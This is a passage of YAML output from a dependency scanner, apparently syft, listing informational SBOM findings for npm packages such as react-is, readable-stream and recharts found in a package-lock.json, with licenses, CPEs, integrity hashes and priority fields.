remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0db53ea4a0e10790
|
|
name: react-is
|
|
version: 16.13.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:react-is:react-is:16.13.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react-is:react_is:16.13.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react_is:react-is:16.13.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react_is:react_is:16.13.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react:react-is:16.13.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react:react_is:16.13.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/react-is@16.13.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/react-is/-/react-is-16.13.1.tgz
|
|
integrity: sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 320c91417fe22e47
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: react-is 18.3.1'
|
|
title: react-is 18.3.1
|
|
description: 'Package discovered: react-is 18.3.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 756017d5bfb89c54
|
|
name: react-is
|
|
version: 18.3.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:react-is:react-is:18.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react-is:react_is:18.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react_is:react-is:18.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react_is:react_is:18.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react:react-is:18.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react:react_is:18.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/react-is@18.3.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz
|
|
integrity: sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e00babcb3a543f4c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: react-promise-suspense 0.3.4'
|
|
title: react-promise-suspense 0.3.4
|
|
description: 'Package discovered: react-promise-suspense 0.3.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 74a57b2250b339b3
|
|
name: react-promise-suspense
|
|
version: 0.3.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:react-promise-suspense:react-promise-suspense:0.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react-promise-suspense:react_promise_suspense:0.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react_promise_suspense:react-promise-suspense:0.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react_promise_suspense:react_promise_suspense:0.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react-promise:react-promise-suspense:0.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react-promise:react_promise_suspense:0.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react_promise:react-promise-suspense:0.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react_promise:react_promise_suspense:0.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react:react-promise-suspense:0.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react:react_promise_suspense:0.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/react-promise-suspense@0.3.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/react-promise-suspense/-/react-promise-suspense-0.3.4.tgz
|
|
integrity: sha512-I42jl7L3Ze6kZaq+7zXWSunBa3b1on5yfvUW6Eo/3fFOj6dZ5Bqmcd264nJbTK/gn1HjjILAjSwnZbV4RpSaNQ==
|
|
dependencies:
|
|
fast-deep-equal: ^2.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 45e27e6a5bb4b37b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: react-smooth 4.0.4'
|
|
title: react-smooth 4.0.4
|
|
description: 'Package discovered: react-smooth 4.0.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 646f82a1b8ded3b2
|
|
name: react-smooth
|
|
version: 4.0.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:react-smooth:react-smooth:4.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react-smooth:react_smooth:4.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react_smooth:react-smooth:4.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react_smooth:react_smooth:4.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react:react-smooth:4.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react:react_smooth:4.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/react-smooth@4.0.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/react-smooth/-/react-smooth-4.0.4.tgz
|
|
integrity: sha512-gnGKTpYwqL0Iii09gHobNolvX4Kiq4PKx6eWBCYYix+8cdw+cGo3do906l1NBPKkSWx1DghC1dlWG9L2uGd61Q==
|
|
dependencies:
|
|
fast-equals: ^5.0.1
|
|
prop-types: ^15.8.1
|
|
react-transition-group: ^4.4.5
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8e8ac167acac7b76
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: react-transition-group 4.4.5'
|
|
title: react-transition-group 4.4.5
|
|
description: 'Package discovered: react-transition-group 4.4.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 15c7effc6183b848
|
|
name: react-transition-group
|
|
version: 4.4.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:react-transition-group:react-transition-group:4.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react-transition-group:react_transition_group:4.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react_transition_group:react-transition-group:4.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react_transition_group:react_transition_group:4.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react-transition:react-transition-group:4.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react-transition:react_transition_group:4.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react_transition:react-transition-group:4.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react_transition:react_transition_group:4.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react:react-transition-group:4.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:react:react_transition_group:4.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/react-transition-group@4.4.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/react-transition-group/-/react-transition-group-4.4.5.tgz
|
|
integrity: sha512-pZcd1MCJoiKiBR2NRxeCRg13uCXbydPnmB4EOeRrY7480qNWO8IIgQG6zlDkm6uRMsURXPuKq0GWtiM59a5Q6g==
|
|
dependencies:
|
|
'@babel/runtime': ^7.5.5
|
|
dom-helpers: ^5.0.1
|
|
loose-envify: ^1.4.0
|
|
prop-types: ^15.6.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0cce3cd1fd3c13cf
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: read-cache 1.0.0'
|
|
title: read-cache 1.0.0
|
|
description: 'Package discovered: read-cache 1.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 5f64d7de79050a02
|
|
name: read-cache
|
|
version: 1.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:read-cache:read-cache:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:read-cache:read_cache:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:read_cache:read-cache:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:read_cache:read_cache:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:read:read-cache:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:read:read_cache:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/read-cache@1.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/read-cache/-/read-cache-1.0.0.tgz
|
|
integrity: sha512-Owdv/Ft7IjOgm/i0xvNDZ1LrRANRfew4b2prF3OWMQLxLfu3bS8FVhCsrSCMK4lR56Y9ya+AThoTpDCTxCmpRA==
|
|
dependencies:
|
|
pify: ^2.3.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c7ae55737c4393af
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: readable-stream 2.3.8'
|
|
title: readable-stream 2.3.8
|
|
description: 'Package discovered: readable-stream 2.3.8'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: deca1a198ab80d23
|
|
name: readable-stream
|
|
version: 2.3.8
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:readable-stream:readable-stream:2.3.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:readable-stream:readable_stream:2.3.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:readable_stream:readable-stream:2.3.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:readable_stream:readable_stream:2.3.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:readable:readable-stream:2.3.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:readable:readable_stream:2.3.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/readable-stream@2.3.8
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz
|
|
integrity: sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==
|
|
dependencies:
|
|
core-util-is: ~1.0.0
|
|
inherits: ~2.0.3
|
|
isarray: ~1.0.0
|
|
process-nextick-args: ~2.0.0
|
|
safe-buffer: ~5.1.1
|
|
string_decoder: ~1.1.1
|
|
util-deprecate: ~1.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 303fe49ee8d1f69a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: readable-stream 3.6.2'
|
|
title: readable-stream 3.6.2
|
|
description: 'Package discovered: readable-stream 3.6.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 066e44c97461677f
|
|
name: readable-stream
|
|
version: 3.6.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:readable-stream:readable-stream:3.6.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:readable-stream:readable_stream:3.6.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:readable_stream:readable-stream:3.6.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:readable_stream:readable_stream:3.6.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:readable:readable-stream:3.6.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:readable:readable_stream:3.6.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/readable-stream@3.6.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz
|
|
integrity: sha512-9u/sniCrY3D5WdsERHzHE4G2YCXqoG5FTHUiCC4SIbr6XcLZBY05ya9EKjYek9O5xOAwjGq+1JdGBAS7Q9ScoA==
|
|
dependencies:
|
|
inherits: ^2.0.3
|
|
string_decoder: ^1.1.1
|
|
util-deprecate: ^1.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9230ea38673dd70b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: readdirp 3.6.0'
|
|
title: readdirp 3.6.0
|
|
description: 'Package discovered: readdirp 3.6.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: beb5f9a5d33de00e
|
|
name: readdirp
|
|
version: 3.6.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:readdirp:readdirp:3.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/readdirp@3.6.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz
|
|
integrity: sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA==
|
|
dependencies:
|
|
picomatch: ^2.2.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ec316d1c56cfd200
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: recharts 2.15.4'
|
|
title: recharts 2.15.4
|
|
description: 'Package discovered: recharts 2.15.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 98e64f0b2bbef0ce
|
|
name: recharts
|
|
version: 2.15.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:recharts:recharts:2.15.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/recharts@2.15.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/recharts/-/recharts-2.15.4.tgz
|
|
integrity: sha512-UT/q6fwS3c1dHbXv2uFgYJ9BMFHu3fwnd7AYZaEQhXuYQ4hgsxLvsUXzGdKeZrW5xopzDCvuA2N41WJ88I7zIw==
|
|
dependencies:
|
|
clsx: ^2.0.0
|
|
eventemitter3: ^4.0.1
|
|
lodash: ^4.17.21
|
|
react-is: ^18.3.1
|
|
react-smooth: ^4.0.4
|
|
recharts-scale: ^0.4.4
|
|
tiny-invariant: ^1.3.1
|
|
victory-vendor: ^36.6.8
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 249969671e277623
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: recharts-scale 0.4.5'
|
|
title: recharts-scale 0.4.5
|
|
description: 'Package discovered: recharts-scale 0.4.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b982e93a08325fbd
|
|
name: recharts-scale
|
|
version: 0.4.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:recharts-scale:recharts-scale:0.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:recharts-scale:recharts_scale:0.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:recharts_scale:recharts-scale:0.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:recharts_scale:recharts_scale:0.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:recharts:recharts-scale:0.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:recharts:recharts_scale:0.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/recharts-scale@0.4.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/recharts-scale/-/recharts-scale-0.4.5.tgz
|
|
integrity: sha512-kivNFO+0OcUNu7jQquLXAxz1FIwZj8nrj+YkOKc5694NbjCvcT6aSZiIzNzd2Kul4o4rTto8QVR9lMNtxD4G1w==
|
|
dependencies:
|
|
decimal.js-light: ^2.4.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
